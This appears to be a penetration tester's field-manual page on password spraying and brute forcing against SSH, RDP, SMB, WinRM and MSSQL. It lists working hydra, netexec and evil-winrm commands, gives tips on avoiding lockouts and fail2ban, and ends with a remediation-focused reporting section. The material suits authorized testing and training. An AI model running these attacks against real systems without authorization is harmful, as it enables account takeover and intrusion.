Field Manual

Password Attacks Network Services

4 min read

πŸ›‘οΈ Methodology Checklist

  • Identify exposed authentication services: SSH, RDP, SMB, WinRM, FTP, MSSQL, MySQL
  • Check password policy to determine safe spray rate
  • Test default credentials first (admin/admin, root/root, service/service)
  • Spray with valid username list and common passwords
  • SSH spray: hydra -L users.txt -P pass.txt ssh://[TARGET]
  • SMB spray: nxc smb [TARGET] -u users.txt -p passwords.txt --continue-on-success
  • WinRM: nxc winrm [TARGET] -u users.txt -p passwords.txt
  • MSSQL: hydra -L users.txt -P pass.txt mssql://[TARGET]

🎯 Operational Context

Use when: Valid credentials needed for network service access β€” brute force or spray SSH, FTP, SMB, WinRM, RDP, HTTP forms. Think Dumber First: Don’t brute force blindly β€” spray one common password across all users before trying multiple passwords against one user. Password123! and Welcome1 catch more accounts than exhaustive single-user brute. Skip when: Service has strong lockout policy β€” calculate spray rate first with --pass-pol check.

⚑ Tactical Cheatsheet

CommandTactical Outcome
netexec winrm [TARGET_IP] -u [USER_LIST] -p [PASS_LIST]Spray credentials against WinRM
evil-winrm -i [TARGET_IP] -u [USER] -p [PASS]Open PowerShell session via WinRM
hydra -L [USER_LIST] -P [PASS_LIST] ssh://[TARGET_IP]Brute-force SSH
ssh [USER]@[TARGET_IP]Connect via SSH
hydra -L [USER_LIST] -P [PASS_LIST] rdp://[TARGET_IP] -t 4Brute-force RDP (low thread count to avoid crashes)
xfreerdp /v:[TARGET_IP] /u:[USER] /p:[PASS]Connect via RDP from Linux
hydra -L [USER_LIST] -P [PASS_LIST] smb://[TARGET_IP]Brute-force SMB (may fail on SMBv3)
netexec smb [TARGET_IP] -u [USER_LIST] -p [PASS_LIST]Spray SMB credentials
netexec smb [TARGET_IP] -u [USER] -p [PASS] --sharesEnumerate shares with valid creds
smbclient -U [USER] \\\\[TARGET_IP]\\[SHARE]Connect to SMB share
use auxiliary/scanner/smb/smb_loginMSF module for SMB auth (reliable on SMBv3)

πŸ”¬ Deep Dive & Workflow

WinRM β€” Port 5985/5986

Microsoft’s WS-Management protocol (SOAP/XML over HTTP/HTTPS). Used by Enter-PSSession, PowerShell remoting, and evil-winrm.

Successful spray output shows (Pwn3d!) next to the credential pair β€” indicates the account has admin/execute rights, not just authentication.

netexec winrm [TARGET_IP] -u user.list -p password.list
# TARGET [TARGET_IP]:5985 WinRM - [+] domain\user:pass (Pwn3d!)

Evil-WinRM provides an interactive PowerShell session:

sudo gem install evil-winrm
evil-winrm -i [TARGET_IP] -u [USER] -p [PASS]

SSH β€” Port 22

Standard Hydra dictionary attack. SSH rate-limits aggressively on most systems β€” don’t over-thread:

hydra -L user.list -P password.list ssh://[TARGET_IP]

RDP β€” Port 3389

RDP is sensitive to connection speed. High thread counts crash the service or trigger lockouts:

  • Use -t 4 (max 4 threads) or -t 1 for fragile targets
  • Use -W flag to add delay between attempts

Connect with xfreerdp (type Y to trust the certificate on first connection):

xfreerdp /v:[TARGET_IP] /u:[USER] /p:[PASS]

SMB β€” Port 445

Three attack methods in priority order:

  1. NetExec β€” most reliable, handles SMBv3
  2. MSF smb_login β€” fallback when Hydra fails on SMBv3
  3. Hydra β€” may error invalid reply from target on modern Windows

After getting valid credentials, enumerate shares before mounting:

netexec smb [TARGET_IP] -u [USER] -p [PASS] --shares
smbclient -U [USER] \\\\[TARGET_IP]\\SHARENAME

πŸ› οΈ Troubleshooting & Edge Cases

ProblemCauseFix
Hydra module not found for serviceWrong service nameList modules: hydra -U http-post-form; service names: ssh, ftp, smb, rdp, http-get, http-post-form
Hydra returns false positivesSuccess condition wrongFor form brute: check failure string carefully in -f flag; test manually first
SSH brute detected and blockedfail2ban or IDSReduce rate: hydra -t 2 -w 3; or use Medusa with lower thread count
WinRM brute failsAuthentication type mismatchUse nxc: nxc winrm [TARGET] -u users.txt -p pass.txt β€” handles WinRM auth correctly
HTTP form brute missing CSRFDynamic token requiredUse Burp Intruder with macro to capture fresh CSRF token per request

πŸ“ Reporting Trigger

Finding Title: Network Service Credentials Compromised via Password Attack Impact: Valid credentials obtained through password spraying or brute force provide authenticated access to target services, bypassing all technical controls that require authentication as the security boundary. Root Cause: Weak or default passwords in use. No MFA implemented. Failed authentication not alerted or rate-limited at the service level. Recommendation: Implement MFA for all network services. Deploy centralized authentication with lockout policies. Alert on failed authentication bursts. Conduct organization-wide forced password reset for all accounts with weak passwords.

πŸ”— Related Nodes

Graph View

Backlinks